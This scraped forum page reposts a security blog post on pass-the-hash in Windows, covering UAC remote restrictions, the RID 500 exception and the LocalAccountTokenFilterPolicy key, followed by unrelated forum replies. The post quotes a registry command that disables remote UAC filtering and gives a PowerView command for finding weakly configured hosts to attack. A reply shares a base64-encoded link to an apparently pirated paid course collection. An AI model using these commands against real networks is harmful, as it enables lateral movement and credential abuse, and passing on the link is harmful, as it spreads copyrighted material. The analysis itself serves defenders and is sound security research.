computer, and the user cannot perform administrative tasks. If the user wants to administer the workstation with a Security Account Manager (SAM) account, the user must interactively log on to the computer that is to be administered with Remote Assistance or Remote Desktop. And for domain user accounts in a local “Administrators” group, the document states: When a user with a domain user account logs on to a Windows Vista computer remotely, and the user is a member of the Administrators group, the domain user will run with a full administrator access token on the remote computer and UAC is disabled for the user on the remote computer for that session. So that explains why local admin accounts fail with remote access (except through RDP) as well as why domain accounts are successful. But why does the built-in RID 500 Administrator account act as a special case? Because by default the built-in administrator account (even if renamed) runs all applications with full administrative privileges (“full token mode”), meaning that user account control is effectively not applied. So when remote actions are initiated using this account, a full high-integrity (i.e. non-filtered) token is granted, allowing for proper administrative access! There is one exception- “Admin Approval Mode”. The key that specifies this is at HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken and is disabled by default. However, if this key is enabled, the RID 500 account (even if it’s renamed) is enrolled in UAC protection. This means that remote PTH to the machine using that account will then fail. But there’s a silver lining for attackers- this key is often set through Group Policy, meaning that any domain authenticated user can enumerate what machines do and do not have FilterAdministratorToken set through the application of GPOs. While this will miss cases where the key is set on a standard “gold” image, performing this key enumeration from the initial machine an attacker lands on, combined with GPO enumeration, should cover most situations. And remember that while Windows disables the built-in -500 Administrator account by default, it’s still fairly common to see it enabled across enterprises. My original pass-the-hash post covered basic remote enumeration of this information, and this post goes into even more detail. LocalAccountTokenFilterPolicy There’s another silver lining for us attackers, something that has much more defensive implications than we initially realized. Jonathan Renard touched on some of this (as well as Admin Approval Mode) in his “*Puff* *Puff* PSExec” post, but I wanted to expand just a bit in relation to the overall pass-the-hash discussion. If the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy key exists (which doesn’t by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. This means that a non-RID 500 account connections aren’t filtered and can successfully pass-the-hash! So why would you possibly set this registry entry? Googling for the key name will turn up different scenarios where this functions as a workaround, but there’s one frequent violator: Windows Remoting. There is a non-trivial amount of Microsoft documentation that recommends setting LocalAccountTokenFilterPolicy to 1 as a workaround or solution to various issues: “Disabling Remote UAC by changing the registry entry that controls Remote UAC is not recommended, but may be necessary…” “Set-ItemProperty –Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System –Name LocalAccountTokenFilterPolicy –Value 1 –Type DWord” “User Account Control (UAC) affects access to the WinRM service” “…you can use the LocalAccountTokenFilterPolicy registry entry to change the default behavior and allow remote users who are members of the Administrators group to run with Administrator privileges.” “How to disable UAC remote restrictions” In addition, I believe there are some situations where the WinRM quickconfig may even set this key automatically, but I was not able to reliably recreate this scenario. Microsoft’s “Obtaining Data from a Remote Computer” document further details: Because of User Account Control (UAC), the remote account must be a domain account and a member of the remote computer Administrators group. If the account is a local computer member of the Administrators group, then UAC does not allow access to the WinRM service. To access a remote WinRM service in a workgroup, UAC filtering for local accounts must be disabled by creating the following DWORD registry entry and setting its value to 1: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] LocalAccountTokenFilterPolicy. This is bad advice, BAD BAD BAD BAD BAD! I realize that this setting maybe needed to facilitate some specific WinRM deployment scenarios, but once LocalAccountTokenFilterPolicy is set to 1 then ANY local administrator account on a machine can be used to pass-the-hash to the target. I feel that most people, myself included, have not realized the actual security implications of this modification. The only real warning I saw through all of the Microsoft documentation was “Caution: The LocalAccountTokenFilterPolicy entry disables user account control (UAC) remote restrictions for all users of all affected computers. Consider the implications of this setting carefully before changing the policy”. As this setting enables a large amount of risk for an enterprise environment, I hoped for a better set of definitive guidance and warnings from Microsoft beyond “consider the implications”, but ¯\_(ツ)_/¯ Operationally (from an offensive perspective) it’s good to check if your pivot machine has the LocalAccountTokenFilterPolicy key set to 1, as other machines in the same subnet/OU may have the same setting. You can also enumerate Group Policy settings to see if this key is set through GPO, something again that I will cover in a future post. Finally, you can use PowerView to enumerate any Windows 7 and Service 2008 machines with Windows Remoting enabled, hoping that they have run some kind of Windows Remoting setup incorrectly: Get-DomainComputer -LDAPFilter "(|(operatingsystem=*7*)(operatingsystem=*2008*))" -SPN "wsman*" -Properties dnshostname,serviceprincipalname,operatingsystem,distinguishedname | fl It’s also worth noting that Microsoft’s LAPS effectively renders everything here moot. As LAPS randomizes the local administrator password for machines on a periodic basis, pass-the-hash will effectively still work, but it greatly limits the ability to recover and reuse local key material. This renders traditional PTH attacks (with local accounts at least) largely ineffective. Have fun! Originally published at harmj0y. Sursa: https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167
    1 point
  14. Cel mai probabil e vreun laptop ciordit de la mare, nu ar avea sens altfel de ce ar fi instalat un astfel de sistem iar op cu 1 post sa nu aibe habar.
    1 point
  15. Hi, If anyone needs the entire collection here is the link: aHR0cHM6Ly9tZWdhLm56LyMhQjNoU0ZBUUEhRjRwMFZWYU9qM2hrRy1Ub1NVQ2FzemNZeGw2S2ZsbVB2eHQ2R0M0cTRmOA== PS: I agree with what Nytro said. The only reason for posting the entire collection is that I want to help the community and specially the ones that cannot afford the money yet. I am posting the link for a definite amount of time and then it will disappear. The link is base64 for those who do not know. By the way, Vivek`s English is ok (believe me, others are far worst at English than he is). Fave fun!
    1 point
  16. Salut, Sunt interesat de tutoriale pe MITM si analyza pachetelor pentru un astel de scenariu. Daca aveti link-uri in directia asta cu topicuri de pe forum va rog sa le trimiteti ca RE sau pe PM. Thanks!
    -1 points
  17. Buna seara evlaviosii mei, forumul functioneaza perfect pe OS Biserica cu Firefox binecuvantat. //biserica logout
    -1 points
  18. Hai noroc! Mai fumeji?
    -3 points
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